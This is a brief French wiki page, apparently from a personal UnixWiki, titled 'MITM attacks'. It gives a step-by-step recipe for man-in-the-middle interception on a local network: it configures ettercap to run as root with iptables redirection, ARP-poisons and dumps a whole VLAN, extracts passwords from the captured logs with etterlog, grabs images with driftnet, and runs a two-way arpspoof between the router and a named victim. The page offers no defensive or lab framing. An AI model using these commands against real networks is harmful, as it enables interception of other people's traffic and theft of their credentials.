MITM attacks

De UnixWiki
Version datée du 18 août 2014 à 10:17 par Futex (discussion | contributions)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigation Aller à la recherche

Ettercap

Edit /etc/ettercap/etter.conf

Mettre à la place de la valeur par défaut

 ec_uid = 0                     
 ec_gid = 0

Et decommenter

  # if you use iptables:
  # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Capture tout le VLAN (bourrin)

 # ettercap -T -M arp -L dump ////

Pour logger

 # ettercap -T -M arp -L dump ////

Utiliser etterlog pour parser les logs

 # etterlog -p dump.eci (affiche les mot de passes)

Pour récupérer les images

 # driftnet -i etho

arpspoof

 # arpspoof -i interface -t IP.DU.ROUTEUR IP.DE.LA.VICTIME

On inverse l'operation dans un autre shell en même temps :

 # arpspoof -i interface -t IP.DE.LA.VICTIME IP.DU.ROUTEUR